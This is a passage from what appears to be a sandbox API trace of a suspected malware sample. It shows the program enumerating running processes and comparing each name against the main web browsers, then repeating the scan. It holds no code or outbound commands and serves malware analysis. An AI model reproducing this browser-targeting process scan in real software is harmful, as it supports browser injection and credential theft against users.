lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0190.673] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0190.673] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0190.673] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0190.673] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0190.673] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.673] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0190.674] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0190.674] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0190.674] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0190.674] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0190.674] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.674] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0190.674] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0190.674] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0190.674] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0190.674] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0190.674] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.674] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0190.675] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0190.675] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0190.675] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0190.675] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0190.675] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.675] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0190.676] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0190.676] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0190.676] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0190.676] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0190.676] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.676] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0190.676] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0190.676] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0190.676] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0190.676] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0190.676] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.676] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0190.677] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0190.677] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0190.677] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0190.677] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0190.677] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.677] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0190.677] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0190.677] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0190.677] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0190.677] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0190.677] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.677] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0190.678] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0190.678] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0190.678] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0190.678] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0190.678] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.678] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0190.679] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0190.679] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0190.679] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0190.679] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0190.679] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.679] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0190.679] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0190.679] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0190.679] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0190.679] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0190.679] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.679] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0190.680] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0190.680] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0190.680] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0190.680] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0190.680] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.680] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0190.680] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0190.680] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0190.680] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0190.680] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0190.680] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.680] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0190.681] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0190.681] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0190.681] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0190.681] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0190.681] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.681] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0190.682] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0190.682] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0190.682] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0190.682] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0190.682] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.682] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0190.682] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0190.682] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0190.682] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0190.682] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0190.682] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.682] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0190.683] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0190.683] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0190.683] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0190.683] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0190.683] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.683] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0190.683] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0190.683] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0190.683] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0190.683] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0190.683] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.683] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0190.684] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0190.684] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0190.684] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0190.684] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0190.684] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.684] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0190.684] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0190.685] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0190.685] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0190.685] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0190.685] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.685] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0190.685] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0190.685] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0190.685] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0190.685] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0190.685] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.685] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.686] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0190.686] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0190.686] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0190.686] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0190.686] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.686] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0190.686] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0190.686] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0190.686] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0190.686] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0190.686] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.686] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.687] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0190.687] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0190.687] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0190.687] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0190.687] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.687] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0190.687] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0190.688] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0190.688] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0190.688] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0190.688] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.688] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.688] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0190.688] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0190.688] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0190.688] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0190.688] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.688] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0190.689] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0190.689] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0190.689] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0190.689] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0190.689] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.689] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0190.689] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0190.689] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0190.689] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0190.689] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0190.689] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.689] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0190.690] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0190.690] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0190.690] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0190.690] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0190.690] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.690] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0190.690] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0190.691] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0190.691] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0190.691] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0190.691] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.691] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0190.691] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0190.691] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0190.691] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0190.691] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0190.691] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.691] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0190.692] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0190.692] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0190.692] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0190.692] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0190.692] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.692] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0190.692] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0190.692] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0190.692] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0190.692] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0190.692] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.692] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0190.693] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0190.693] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0190.693] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0190.693] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0190.693] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0190.693] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0190.693] CloseHandle (hObject=0xe8) returned 1 [0190.694] Sleep (dwMilliseconds=0x3e8) [0191.930] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0191.932] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0191.933] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0191.933] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0191.933] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0191.933] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0191.933] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0191.933] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0191.933] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0191.934] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0191.934] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0191.934] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0191.934] 